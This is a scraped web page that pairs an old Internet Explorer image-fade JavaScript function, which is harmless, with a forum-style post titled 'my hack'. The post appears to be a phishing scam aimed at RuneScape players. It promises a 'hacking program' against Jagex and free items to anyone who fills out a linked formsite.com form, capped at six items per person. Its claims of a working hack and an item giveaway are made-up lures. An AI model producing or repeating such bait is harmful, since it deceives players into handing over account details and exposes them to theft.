<*****>
nereidFadeObjects = new Object();
nereidFadeTimers = new Object();
/* object - image to be faded (actual object, not name);
* destop - destination transparency level (ie 80, for mostly solid)
* rate - time in milliseconds between trasparency changes (best under 100)
* delta - amount of change each time (ie 5, for 5% change in transparency)
*/
function nereidFade(object, destOp, rate, delta){
if (!document.all)
return
if (object != "[object]"){ //do this so I can take a string too
setTimeout("nereidFade("+object+","+destOp+","+rate+","+delta+")",0);
return;
}
clearTimeout(nereidFadeTimers[object.sourceIndex]);
diff = destOp-object.filters.alpha.opacity;
direction = 1;
if (object.filters.alpha.opacity > destOp){
direction = -1;
}
delta=Math.min(direction*diff,delta);
object.filters.alpha.opacity+=direction*delta;
if (object.filters.alpha.opacity != destOp){
nereidFadeObjects[object.sourceIndex]=object;
nereidFadeTimers[object.sourceIndex]=setTimeout("nereidFade(nereidFadeObjects["+object.sourceIndex+"],"+destOp+","+rate+","+delta+")",rate);
}
}
*****>
my hack
i have actually made i made a hacking program click link below and fill out form in the site the link brings you to. then sit tight and wait for all your stuff to come rolling in.
heres link (below) fs12.formsite.com/hackinr...index.html
or to be safe if you dont want to risk being cuaght by jagex with a program that hacks their system. you can fill out this form i have hacked and got a bunch of items i put it on this account and now i am giving it all away i cannot give the whole account away because my lil brother wants it when hes old enough to play this game. so fill out form on the site that this link below brings u to and soon you will have the items you requested but dont take all items lets keep it at a 6 item limit per person and if the item you wanted is no longer there i will give next best thing.
heres link (below)